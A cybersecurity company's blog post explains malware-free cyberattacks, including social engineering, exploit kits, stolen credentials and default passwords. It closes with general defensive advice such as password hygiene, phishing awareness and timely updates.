NetworkTigers defines malware-free cyberattacks and how to defend yourself.
Spyware, crypto stealers, RATs, and more are often cited as the primary means hackers carry out their misdeeds. Less often described, however, is the malware-free cyberattack. These attacks are gaining popularity, with crafty criminals using harder-to-spot techniques to part individuals with their data and penetrate targeted networks undetected.
Malware-free cyberattacks explained
Defined simply, a malware-free cyberattack is when a threat actor relies on legitimate tools, system files, applications, and social engineering tactics to compromise a victim network instead of directly injecting it with malicious code.
A malware-free cyberattack could see a threat actor leveraging exploits in an insecure piece of software, misusing an app’s built-in features, or engaging with a victim via a phone call or messaging platform.
While the end goal of a network breach or data theft remains the same, malware-free attacks steadily increase as cybersecurity protocols become more effective at identifying malicious software and viruses. 71% of enterprise cyberattacks in 2022 were executed with no malware involved.
By operating without malware, threat actors can gain access to sensitive data without using any of the tactics that would typically give away their position.
Ways that hackers can attack without malware
Social engineering
Social engineering attacks are a common form of malware-free cyberattack, as they require no extensive coding or, realistically, any deep computing knowledge if executed in a manner that doesn’t demand it. Social engineering can present as a phone call, text message, email, or other interaction that sees a threat actor attempt to trick a victim into handing over sensitive information willingly.
By using various means of manipulation, many threat actors opt to “hack” people instead of their devices.
A threat actor adept at social engineering may pose as a concerned customer, a colleague, a known associate, a family member, or even a member of a government agency. In some cases, social engineering is used in tandem with other techniques. This may include persuading a victim to allow the threat actor remote control of their computer or convincing them to download software that will enable them to access the network they’re connected to.
Exploit kits
Apps, platforms, and operating systems are complex systems that often harbor flaws or bugs that can be exploited for nefarious purposes.
Exploit kits are collections of code, command sequences, and data that hackers use to turn a system against itself without ever touching a piece of malware. Bought and sold on the internet through hacker forums, marketplaces, and message boards, exploit kits can scan a targeted system, identify vulnerabilities within it, and then generate a plan of attack tailored to a victim’s specific configuration.
These types of attacks are called living off the land (LOTL) attacks or fileless attacks.
Because exploit kits take advantage of the intricate nature of a computer’s interplay between a huge number of apps and software types, users must keep their systems continually updated to prevent hackers from pouncing on any newly discovered weaknesses.
2021’s discovery of Apache’s Log4Shell vulnerability and the fact that it is still being leveraged are examples of how dangerous specific weaknesses can prove when hackers understand how to take advantage of them.
Stolen credentials
Threat actors will always choose the path of least resistance when it comes to cybercrime, and nothing is easier than simply unlocking the front door with a key.
Login credentials can be grabbed in several different ways. In some cases, they can be purchased by the thousands from hackers who have already done the dirty work of penetrating a system and exfiltrating its data. They can also be gained via social engineering or tools that cycle through and submit easily guessed or commonly used passwords.
No matter the means of procurement, when a threat actor uses stolen credentials, they are granted the same access enjoyed by the legitimate user they are logging in as and are free to perform whatever misdeeds they want without alerting any network security features.
Poor password hygiene
Users are encouraged to generate hard-to-guess passwords full of randomized letters, numbers, and symbols. However, these types of passwords are, by their very design, nearly impossible to remember, and many people resort to using the same simple password across multiple accounts or, worse yet, never changing the default password that comes with their devices.
Using the same password for numerous platforms means that a compromise of one account is essentially a compromise of someone’s entire online footprint. Threat actors understand human nature and, upon gaining login credentials, will get right to work seeing if those same passwords work on a victim’s email, social media accounts, banking institutions, and more.
Specific devices, most notably wireless routers, have passwords printed on them that users submit to set up their hardware. Most users, including those who should know better, continue to use that password for as long as they need the device.
Threat actors have access to lists of these default passwords, meaning they should all be assumed to be compromised upon delivery. People who retain these default passwords are low-hanging fruit and subject their devices, data, and network to the possibility of a malware-free cyberattack.
How to defend against malware-free cyberattacks
The trouble with malware-free attacks is that there is no single means to defend against many different intrusion strategies. While viruses and trojans can be effectively kept at bay with robust, up-to-date antivirus software that is largely automated, preventing a malware-free attack requires agile diligence.
Maintain good password hygiene. Don’t reuse passwords, and ensure login credentials are impossible to guess. Change default passwords on any hardware after your initial setup is complete.
Know how to spot a social engineering scheme. Employee training and good judgment are the best defenses against an attack designed to appeal to someone’s humanity. Teach workers how to identify phishing emails and fraudulent messages. In the age of deep fakes, consider creating verbal or written code words that can be used to identify whether or not the person on the other end of the line is an imposter.
Keep systems up to date. By automating updates and keeping every platform, OS, and app current, the ability of a hacker to exploit your system is decreased significantly. Don’t allow any component of your network to fall behind.
About NetworkTigers
NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com
